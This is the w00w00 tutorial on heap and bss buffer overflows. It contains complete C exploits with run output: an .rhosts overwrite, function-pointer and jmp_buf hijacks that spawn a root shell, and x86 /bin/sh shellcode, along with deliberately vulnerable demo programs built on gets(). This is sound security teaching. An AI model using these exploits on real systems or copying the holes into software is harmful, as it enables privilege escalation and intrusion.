This is a collection of the insights we have gained through our research with heap-based overflows and the like. We have written all the examples and exploits included in this article; therefore, the copyright applies to them as well.

Why Heap/BSS Overflows are Significant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As more system vendors add non-executable stack patches, or individuals apply their own patches (e.g., Solar Designer's non-executable stack patch), a different method of penetration is needed by security consultants (or else, we won't have jobs!). Let me give you a few examples:

1. Searching for the word "heap" on BugTraq (for the archive, see www.geek-girl.com/bugtraq) yields only 40+ matches, whereas "stack" yields 2300+ matches (though several are irrelevant). Also, "stack overflow" gives twice as many matches as "heap" does.

2. As of Solaris 2.6, sparc Solaris (an OS developed by Sun Microsystems) includes a "protect_stack" option, but not an equivalent "protect_heap" option. Fortunately, the bss is not executable (and need not be).

3. There is a "StackGuard" (developed by Crispin Cowan et al.), but no equivalent "HeapGuard".

4. Using a heap/bss-based overflow was one of the "potential" methods of getting around StackGuard. The following was posted to BugTraq by Tim Newsham several months ago:

   > Finally the precomputed canary values may be a target
   > themselves. If there is an overflow in the data or bss segments
   > preceding the precomputed canary vector, an attacker can simply
   > overwrite all the canary values with a single value of his
   > choosing, effectively turning off stack protection.

5. Some people have actually suggested making a "local" buffer a "static" buffer, as a fix! This is not very wise; it reflects a fairly common misconception of how the heap and bss work.
Although heap-based overflows are not new, they don't seem to be well understood.

Note: One argument is that the presentation of a "heap-based overflow" is equivalent to a "stack-based overflow" presentation. However, only a small portion of this article presents material in a way equivalent to a "stack-based overflow" presentation.

People go out of their way to prevent stack-based overflows, but leave their heaps/bss' completely open! On most systems, the heap and bss are both executable and writeable (an excellent combination). This makes heap/bss overflows very possible. But, I don't see any reason for the bss to be executable! What is going to be executed in zero-filled memory?!

For the security consultant (the ones doing the penetration assessment), most heap-based overflows are system and architecture independent, including those with non-executable heaps. This will all be demonstrated in the "Exploiting Heap/BSS Overflows" section.

Terminology
~~~~~~~~~~~

An executable file, such as an ELF (Executable and Linking Format) executable, has several "sections", such as: the PLT (Procedure Linking Table), GOT (Global Offset Table), init (instructions executed on initialization), fini (instructions to be executed upon termination), and ctors and dtors (containing global constructors/destructors).

"Memory that is dynamically allocated by the application is known as the heap." The words "by the application" are important here: on good systems most areas are in fact dynamically allocated at the kernel level, while for the heap, the allocation is requested by the application.

Heap and Data/BSS Sections
~~~~~~~~~~~~~~~~~~~~~~~~~~

The heap is an area in memory that is dynamically allocated by the application. The data section is initialized at compile-time. The bss section contains uninitialized data, and is allocated at run-time. Until it is written to, it remains zeroed (or at least from the application's point-of-view).
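The data/bss/heap distinction above can be poked at from a program. A minimal sketch of my own (not the article's code; `bss_starts_zeroed` and `heap_above_bss` are hypothetical helper names, and the heap-above-bss arrangement is the classic Unix layout, not a guarantee on every system):

```c
#include <stdlib.h>
#include <stdint.h>

char data_buf[16] = "initialized";  /* data section: set up at compile time */
char bss_buf[16];                   /* bss section: zero-filled at run time */

/* Returns 1 if every byte of the bss buffer reads as zero before any write. */
int bss_starts_zeroed(void) {
    for (size_t i = 0; i < sizeof bss_buf; i++)
        if (bss_buf[i] != 0)
            return 0;
    return 1;
}

/* Returns 1 if a fresh malloc() block sits at a higher address than the
 * bss -- the classic layout where the heap begins after data/bss and
 * grows upward (towards higher addresses). */
int heap_above_bss(void) {
    char *p = malloc(16);
    int above = (uintptr_t)p > (uintptr_t)bss_buf;
    free(p);
    return above;
}
```

On a typical Linux/x86 build, both checks come back true; the second one is the "heap grows up" picture the article relies on when computing offsets.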
Note: When we refer to a "heap-based overflow" in the sections below, we are most likely referring to buffer overflows of both the heap and data/bss sections.

On most systems, the heap grows up (towards higher addresses). Hence, when we say "X is below Y," it means X is lower in memory than Y.

Exploiting Heap/BSS Overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In this section, we'll cover several different methods to put heap/bss overflows to use. Most of the examples are for Unix-derived x86 systems, but will also work in DOS and Windows (with a few changes). We've also included a few DOS/Windows-specific exploitation methods. An advance warning: this will be the longest section, and should be studied the most.

Note: In this article, I use the "exact offset" approach. The offset must be closely approximated to its actual value. The alternative is the "stack-based overflow approach" (if you will), where one repeats the addresses to increase the likelihood of a successful exploit.

While this example may seem unnecessary, we're including it for those who are unfamiliar with heap-based overflows.
Therefore, we'll include this quick demonstration:

-----------------------------------------------------------------------------
/* demonstrates dynamic overflow in heap (initialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{
   u_long diff;
   char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

   diff = (u_long)buf2 - (u_long)buf1;
   printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff);

   memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';
   printf("before overflow: buf2 = %s\n", buf2);

   memset(buf1, 'B', (u_int)(diff + OVERSIZE));
   printf("after overflow: buf2 = %s\n", buf2);

   return 0;
}
-----------------------------------------------------------------------------

If we run this, we'll get the following:

[root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA

This works because buf1 overruns its boundaries into buf2's heap space. But, because buf2's heap space is still valid (heap) memory, the program doesn't crash.

Note: A possible fix for a heap-based overflow, which will be mentioned later, is to put "canary" values between all variables on the heap space (like that of StackGuard mentioned later) that mustn't be changed throughout execution.

You can get the complete source to all examples used in this article from the file attachment, heaptut.tgz. You can also download this from our article archive at http://www.w00w00.org/articles.html.

Note: To demonstrate a bss-based overflow, change the line from 'char *buf = malloc(BUFSIZE)' to 'static char buf[BUFSIZE]'.

Yes, that was a very basic example, but we wanted to demonstrate a heap overflow at its most primitive level. This is the basis of almost all heap-based overflows.
We can use it to overwrite a filename, a password, a saved uid, etc. Here is a (still primitive) example of manipulating pointers:

-----------------------------------------------------------------------------
/* demonstrates static pointer overflow in bss (uninitialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define BUFSIZE 16
#define ADDRLEN 4 /* # of bytes in an address */

int main()
{
   u_long diff;
   static char buf[BUFSIZE], *bufptr;

   bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;
   printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
          &bufptr, bufptr, buf, diff, diff);

   memset(buf, 'A', (u_int)(diff + ADDRLEN));
   printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
          &bufptr, bufptr, buf, diff, diff);

   return 0;
}
-----------------------------------------------------------------------------

The results:

[root /w00w00/heap/examples/basic]# ./heap3
bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes

When run, one clearly sees that the pointer now points to a different address. Uses of this? One example is that we could overwrite a temporary filename pointer to point to a separate string (such as argv[1], which we could supply ourselves), which could contain "/root/.rhosts". Hopefully, you are starting to see some potential uses. To demonstrate this, we will use a temporary file to momentarily save some input from the user. This is our finished "vulnerable program":

-----------------------------------------------------------------------------
/*
 * This is a typical vulnerable program. It will store user input in a
 * temporary file.
 *
 * Compile as: gcc -o vulprog1 vulprog1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

/*
 * Run this vulprog as root or change the "vulfile" to something else.
 * Otherwise, even if the exploit works, it won't have permission to
 * overwrite /root/.rhosts (the default "example").
 */

int main(int argc, char **argv)
{
   FILE *tmpfd;
   static char buf[BUFSIZE], *tmpfile;

   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
      exit(ERROR);
   }

   tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
   printf("before: tmpfile = %s\n", tmpfile);

   printf("Enter one line of data to put in %s: ", tmpfile);
   gets(buf);

   printf("\nafter: tmpfile = %s\n", tmpfile);

   tmpfd = fopen(tmpfile, "w");
   if (tmpfd == NULL)
   {
      fprintf(stderr, "error opening %s: %s\n", tmpfile, strerror(errno));
      exit(ERROR);
   }

   fputs(buf, tmpfd);
   fclose(tmpfd);
}
-----------------------------------------------------------------------------

The aim of this "example" program is to demonstrate that something of this nature can easily occur in programs (although hopefully not setuid or root-owned daemon servers). And here is our exploit for the vulnerable program:

-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * This will exploit vulprog1.c. It passes some arguments to the
 * program (that the vulnerable program doesn't use). The vulnerable
 * program expects us to enter one line of input to be stored
 * temporarily. However, because of a static buffer overflow, we can
 * overwrite the temporary filename pointer, to have it point to
 * argv[1] (which we could pass as "/root/.rhosts"). Then it will
 * write our temporary line to this file. So our overflow string (what
 * we pass as our input line) will be:
 * + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
 *
 * We use "+ +" (all hosts), followed by '#' (comment indicator), to
 * prevent our "attack code" from causing problems. Without the
 * "#", programs using .rhosts would misinterpret our attack code.
 *
 * Compile as: gcc -o exploit1 exploit1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp()
{
   __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv)
{
   u_long addr;
   register int i;
   int mainbufsize;
   char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

   /* ------------------------------------------------------ */
   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
      exit(ERROR);
   }
   /* ------------------------------------------------------ */

   memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");
   memset(buf + strlen(buf), 'A', DIFF);
   addr = getesp() + atoi(argv[1]);

   /* reverse byte order (on a little endian system) */
   for (i = 0; i < sizeof(u_long); i++)
      buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

   mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;
   mainbuf = (char *)malloc(mainbufsize);
   memset(mainbuf, 0, mainbufsize);

   snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
            buf, VULPROG, VULFILE);

   printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
          addr, VULFILE);

   system(mainbuf);
   return 0;
}
-----------------------------------------------------------------------------

Here's what happens when we run it:

[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after.

before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /vulprog1

Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are close:

[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after.
before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /root/.rhosts
[root /tmp/heap/examples/advanced/vul-pkg1]#

Got it! The exploit overwrites the buffer that the vulnerable program uses for gets() input. At the end of its buffer, it places the address of where we assume argv[1] of the vulnerable program is. That is, we overwrite everything between the overflowed buffer and the tmpfile pointer.

We ascertained the tmpfile pointer's location in memory by sending arbitrary lengths of "A"'s until we discovered how many "A"'s it took to reach the start of tmpfile's address. Also, if you have source to the vulnerable program, you can add a "printf()" to print out the addresses/offsets between the overflowed data and the target data (i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').

(Un)fortunately, the offsets usually change at compile-time (as far as I know), but we can easily recalculate, guess, or "brute force" the offsets.

Note: Now that we need a valid address (argv[1]'s address), we must reverse the byte order for little endian systems. Little endian systems use the least significant byte first (x86 is little endian), so that 0x12345678 is stored in memory as the bytes 0x78 0x56 0x34 0x12. If we were doing this on a big endian system (such as a sparc), we could drop the byte-reversal code and leave the addresses alone.

Further note: So far none of these examples has required an executable heap! As I briefly mentioned in the "Why Heap/BSS Overflows are Significant" section, these previous examples (with the exception of the address byte order) were all system/architecture independent. This is useful in exploiting heap-based overflows.

With knowledge of how to overwrite pointers, we're going to show how to modify function pointers. The downside to exploiting function pointers (and the others to follow) is that they require an executable heap.
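The "reverse byte order" loops used throughout these exploits can be read as one small helper that serializes an address least-significant byte first. A sketch of the same idea (`put_le32` is a hypothetical name, not from the article):

```c
#include <stdint.h>

/* Write a 32-bit address into out[0..3] least-significant byte first --
 * exactly what the exploits' byte-reversal loops do. On a little endian
 * x86 this matches how the address actually sits in memory. */
void put_le32(unsigned char *out, uint32_t addr) {
    for (int i = 0; i < 4; i++)
        out[i] = (addr >> (i * 8)) & 0xff;
}
```

For example, put_le32(buf, 0x12345678) produces the bytes 0x78, 0x56, 0x34, 0x12; on a big endian machine (such as a sparc) you would store the most significant byte first instead, or simply copy the address as-is.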
A function pointer (i.e., "int (*funcptr)(char *str)") allows a programmer to dynamically modify the function to be called. We can overwrite a function pointer by overwriting its address, so that when it's executed, it calls the function we point it to instead. This is good news because we have several options. First, we can include our own shellcode. We can do one of the following with shellcode:

1. argv[] method: store the shellcode in an argument to the program (requiring an executable stack)

2. heap offset method: offset from the top of the heap to the estimated address of the target/overflow buffer (requiring an executable heap)

Note: There is a greater probability of the heap being executable than the stack on any given system. Therefore, the heap method will probably work more often.

A second method is to simply guess (though it's inefficient) the address of a function, using an estimated offset from its address in the vulnerable program. Also, if we know the address of system() in our program, it will be at a very close offset, assuming both vulprog/exploit were compiled the same way. The advantage is that no executable heap or stack is required.

Note: Another method is to use the PLT (Procedure Linking Table), which provides a fixed address through which a shared function is called. I first learned the PLT method from str (stranJer) in a non-executable stack exploit for sparc.

The reason the second method is preferred is simplicity. We can guess the offset of system() in the vulprog from the address of system() in our exploit fairly quickly. The same applies on remote systems (assuming similar versions, operating systems, and architectures). With the stack method, the advantage is that we can do whatever we want, and we don't require compatible function pointers (i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same). The disadvantage (as mentioned earlier) is that it requires an executable stack.
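To make the function-pointer primitive concrete before the full vulnerable program, here is a minimal self-contained sketch of my own (not the article's code): a hypothetical `struct victim` makes the buffer/pointer distance deterministic, whereas with real static variables that distance has to be guessed. Because it redirects the call to a function that already exists in the program, it needs no executable heap or stack, like the system() method:

```c
#include <string.h>

/* Hypothetical layout: a buffer with a function pointer right behind it,
 * mirroring the static buf/funcptr pair in the vulnerable program. */
struct victim {
    char buf[16];
    int (*funcptr)(void);
};

static int good(void) { return 0; }
static int evil(void) { return 1; }   /* stand-in for attacker-chosen code */

/* Overflow buf by exactly one pointer's worth of bytes, rewriting funcptr. */
int clobber(void) {
    struct victim v;
    int (*target)(void) = evil;
    unsigned char payload[16 + sizeof target];

    v.funcptr = good;
    memset(payload, 'A', 16);                     /* filler up to the pointer */
    memcpy(payload + 16, &target, sizeof target); /* pointer bytes, native order */
    memcpy(&v, payload, sizeof payload);          /* the "overflow" */
    return v.funcptr();                           /* now calls evil(), not good() */
}
```

The last memcpy plays the role of the unchecked strncpy in the vulnerable program below: the bytes past the buffer land on the function pointer, and the next indirect call goes wherever we pointed it.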
Here is our vulnerable program for the following 2 exploits:

-----------------------------------------------------------------------------
/*
 * Just the vulnerable program we will exploit.
 * Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 64

int goodfunc(const char *str); /* funcptr starts out as this */

int main(int argc, char **argv)
{
   static char buf[BUFSIZE];
   static int (*funcptr)(const char *str);

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <buf> <goodfunc arg>\n", argv[0]);
      exit(ERROR);
   }

   printf("(for 1st exploit) system() = %p\n", system);
   printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
   printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);

   funcptr = (int (*)(const char *))goodfunc;
   printf("before overflow: funcptr points to %p\n", funcptr);

   memset(buf, 0, sizeof(buf));
   strncpy(buf, argv[1], strlen(argv[1]));
   printf("after overflow: funcptr points to %p\n", funcptr);

   (void)(*funcptr)(argv[2]);
   return 0;
}

/* ---------------------------------------------- */

/* This is what funcptr would point to if we didn't overflow it */
int goodfunc(const char *str)
{
   printf("\nHi, I'm a good function. I was passed: %s\n", str);
   return 0;
}
-----------------------------------------------------------------------------

Our first example is the system() method:

-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * Demonstrates overflowing/manipulating static function pointers in
 * the bss (uninitialized data) to execute functions.
 *
 * Try an offset (argv[1]) in the range of 0-20 (10-16 is best)
 * To compile use: gcc -o exploit1 exploit1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 64 /* the estimated diff between funcptr/buf */
#define VULPROG "./vulprog" /* vulnerable program location */
#define CMD "/bin/sh" /* command to execute if successful */
#define ERROR -1

int main(int argc, char **argv)
{
   register int i;
   u_long sysaddr;
   static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
      fprintf(stderr, "[offset = estimated system() offset]\n\n");
      exit(ERROR);
   }

   sysaddr = (u_long)&system - atoi(argv[1]);
   printf("trying system() at 0x%lx\n", sysaddr);

   memset(buf, 'A', BUFSIZE);

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(sysaddr); i++)
      buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

   execl(VULPROG, VULPROG, buf, CMD, NULL);
   return 0;
}
-----------------------------------------------------------------------------

When we run this with an offset of 16 (which may vary) we get:

[root /w00w00/heap/examples]# ./exploit1 16
trying system() at 0x80484d0
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd3c
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x80484d0
bash#

And our second example, using both argv[] and heap offset method:

-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * This demonstrates how to exploit a static buffer to point the
 * function pointer at argv[] to execute shellcode. This requires
 * an executable heap to succeed.
 *
 * The exploit takes two arguments (the offset and "heap"/"stack").
 * For the argv[] method, it's an estimated offset to argv[2] from
 * the stack top.
 * For the heap offset method, it's an estimated offset
 * to the target/overflow buffer from the heap top.
 *
 * Try values somewhere between 325-345 for the argv[] method, and
 * 420-450 for heap.
 *
 * To compile use: gcc -o exploit2 exploit2.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 64 /* estimated diff between buf/funcptr */
#define VULPROG "./vulprog" /* where the vulprog is */

char shellcode[] = /* just aleph1's old shellcode (linux x86) */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
   "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
   "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* set sp as return value */
}

int main(int argc, char **argv)
{
   register int i;
   u_long sysaddr;
   char buf[BUFSIZE + sizeof(u_long) + 1];

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]);
      exit(ERROR);
   }

   if (strncmp(argv[2], "stack", 5) == 0)
   {
      printf("Using stack for shellcode (requires exec. stack)\n");
      sysaddr = getesp() + atoi(argv[1]);
      printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);
      memset(buf, 'A', BUFSIZE + sizeof(u_long));
   }

   else
   {
      printf("Using heap buffer for shellcode "
             "(requires exec. heap)\n");
      sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
      printf("Using 0x%lx as our buffer's address\n\n", sysaddr);

      if (BUFSIZE + 4 + 1 < strlen(shellcode))
      {
         fprintf(stderr, "error: buffer is too small for shellcode "
                 "(min. = %d bytes)\n", (int)strlen(shellcode));
         exit(ERROR);
      }

      strcpy(buf, shellcode);
      memset(buf + strlen(shellcode), 'A',
             BUFSIZE - strlen(shellcode) + sizeof(u_long));
   }

   buf[BUFSIZE + sizeof(u_long)] = '\0';

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(sysaddr); i++)
      buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

   execl(VULPROG, VULPROG, buf, shellcode, NULL);
   return 0;
}
-----------------------------------------------------------------------------

When we run this with an offset of 334 for the argv[] method we get:

[root /w00w00/heap/examples] ./exploit2 334 stack
Using stack for shellcode (requires exec. stack)
Using 0xbffffd16 as our argv[1] address

(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0xbffffd16
bash#

When we run this with an offset in the 428-442 range for the heap offset method we get:

[root /w00w00/heap/examples] ./exploit2 428 heap
Using heap buffer for shellcode (requires exec. heap)
Using 0x804a9a8 as our buffer's address

(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x804a9a8
bash#

Note: Another advantage to the heap method is that you have a large working range. With the argv[] (stack) method, the offset needed to be exact. With the heap offset method, any offset between 428-442 worked.

As you can see, there are several different methods to exploit the same problem. As an added bonus, we'll include a final type of exploitation that uses jmp_bufs (setjmp/longjmp). A jmp_buf basically stores a stack frame (the saved registers, including the stack pointer and program counter), and execution can jump back to it at a later point.
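Before the vulnerable program, here are the setjmp()/longjmp() mechanics in miniature (a plain demo of my own, no overflow involved): setjmp() stashes the registers, including sp and pc, into the jmp_buf and returns 0; longjmp() restores them, so control re-enters at the setjmp() call site, this time with the value passed to longjmp():

```c
#include <setjmp.h>

static jmp_buf env;

/* First pass: setjmp() returns 0 and we take the longjmp(). Second pass:
 * execution resumes at the setjmp() call, which now "returns" 42.
 * 'phase' is volatile because locals modified between setjmp() and
 * longjmp() are otherwise indeterminate afterwards. */
int jump_demo(void) {
    volatile int phase = 0;

    if (setjmp(env) == 42)    /* second pass: longjmp() delivered 42 */
        return 42 + phase;    /* phase kept its value thanks to volatile */

    phase = 1;                /* first pass: setjmp() returned 0 */
    longjmp(env, 42);         /* restore the saved context; never returns */
    return 0;                 /* not reached */
}
```

The exploit below abuses exactly this: if the saved sp/pc inside the jmp_buf are overwritten before the longjmp(), "resuming" means jumping to an attacker-chosen address instead.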
If we get a chance to overflow a buffer between setjmp() and longjmp(), and the jmp_buf sits above the overflowed buffer, this can be exploited. We can set these up to emulate the behavior of a stack-based overflow (as does the argv[] shellcode method used earlier, also). Note that this is the jmp_buf for an x86 system; it will need to be modified for other architectures, accordingly. First we will include a vulnerable program again:

-----------------------------------------------------------------------------
/*
 * This is just a basic vulnerable program to demonstrate
 * how to overwrite/modify jmp_buf's to modify the course of
 * execution.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <setjmp.h>

#define ERROR -1
#define BUFSIZE 16

static char buf[BUFSIZE];
jmp_buf jmpbuf;

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)
{
   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <string1> <string2>\n", argv[0]);
      exit(ERROR);
   }

   printf("[vulprog] argv[2] = %p\n", argv[2]);
   printf("[vulprog] sp = 0x%lx\n\n", getesp());

   if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */
   {
      fprintf(stderr, "error: exploit didn't work\n");
      exit(ERROR);
   }

   printf("before:\n");
   printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
          jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);
   printf("bp = %p, sp = %p, pc = %p\n\n",
          jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

   strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */

   printf("after:\n");
   printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
          jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);
   printf("bp = %p, sp = %p, pc = %p\n\n",
          jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

   longjmp(jmpbuf, 1);
   return 0;
}
-----------------------------------------------------------------------------

The reason we have the vulnerable program output its stack pointer (esp on x86) is that it makes "guessing" easier for the novice.
And now the exploit for it (you should be able to follow it): ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp) * to emulate a stack-based overflow in the heap. By that I mean, * you would overflow the sp/pc of the jmpbuf. When longjmp() is * called, it will execute the next instruction at that address. * Therefore, we can stick shellcode at this address (as the data/heap * section on most systems is executable), and it will be executed. * * This takes two arguments (offsets): * arg 1 - stack offset (should be about 25-45). * arg 2 - argv offset (should be about 310-330). */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 16 #define VULPROG "./vulprog4" char shellcode[] = /* just aleph1's old shellcode (linux x86) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; u_long getesp() { __asm__("movl %esp,%eax"); /* the return value goes in %eax */ } int main(int argc, char **argv) { int stackaddr, argvaddr; register int index, i, j; char buf[BUFSIZE + 24 + 1]; if (argc <= 1) { fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n", argv[0]); fprintf(stderr, "[stack offset = offset to stack of vulprog\n"); fprintf(stderr, "[argv offset = offset to argv[2]]\n"); exit(ERROR); } stackaddr = getesp() - atoi(argv[1]); argvaddr = getesp() + atoi(argv[2]); printf("trying address 0x%lx for argv[2]\n", argvaddr); printf("trying address 0x%lx for sp\n\n", stackaddr); /* * The second memset() is needed, because otherwise some values * will be (null) and the longjmp() won't do our shellcode. 
*/
   memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);
   buf[BUFSIZE+24] = '\0';

   /* ------------------------------------- */

   /*
    * We need the stack pointer, because to set pc to our shellcode
    * address, we have to overwrite the stack pointer for jmpbuf.
    * Therefore, we'll rewrite it with the real address again.
    */

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(u_long); i++) /* setup BP */
   {
      index = BUFSIZE + 16 + i;
      buf[index] = (stackaddr >> (i * 8)) & 255;
   }

   /* ----------------------------- */

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(u_long); i++) /* setup SP */
   {
      index = BUFSIZE + 20 + i;
      buf[index] = (stackaddr >> (i * 8)) & 255;
   }

   /* ----------------------------- */

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(u_long); i++) /* setup PC */
   {
      index = BUFSIZE + 24 + i;
      buf[index] = (argvaddr >> (i * 8)) & 255;
   }

   execl(VULPROG, VULPROG, buf, shellcode, NULL);
   return 0;
}
-----------------------------------------------------------------------------

Ouch, that was sloppy. But anyway, when we run this with a stack offset of 36 and an argv[2] offset of 322, we get the following:

[root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
trying address 0xbffffcf6 for argv[2]
trying address 0xbffffb90 for sp

[vulprog] argv[2] = 0xbffffcf6
[vulprog] sp = 0xbffffb90

before:
bx = 0x0, si = 0x40001fb0, di = 0x4000000f
bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715

after:
bx = 0x1010101, si = 0x1010101, di = 0x1010101
bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6

bash#

w00w00!

For those of you who are saying, "Okay, I see this works in a controlled environment; but what about in the wild?" -- there is sensitive data on the heap that can be overflowed. Examples include:

   functions                           reason
   -------------------------------------------------------------------
   1. *gets()/*printf(), *scanf()      __iob (FILE) structure in heap
   2. popen()                          __iob (FILE) structure in heap
   3. *dir() (readdir, seekdir, ...)   DIR entries (dir/heap buffers)
   4. atexit()                         static/global function pointers
   5. strdup()                         allocates dynamic data in the heap
   6. getenv()                         stored data on heap
   7. tmpnam()                         stored data on heap
   8. malloc()                         chain pointers
   9. rpc callback functions           function pointers
  10. windows callback functions       func pointers kept on heap
  11. signal handler pointers          function pointers (note: unix
                                       tracks these in the kernel, not
                                       in the heap; in cygnus (gcc for
                                       win), they are kept on the heap)

Now, you can definitely see some uses of these functions. Room allocated for FILE structures by functions such as printf(), fgets(), readdir(), seekdir(), etc. can be manipulated (buffer or function pointers). atexit() has function pointers that will be called when the program terminates. strdup() can store strings (such as filenames or passwords) on the heap. malloc()'s own chain pointers (inside its pool) can be manipulated to access memory it wasn't meant to. getenv() stores data on the heap, which would allow us to modify something such as $HOME after it's initially checked. svc/rpc registration functions (librpc, libnsl, etc.) keep callback functions stored on the heap.

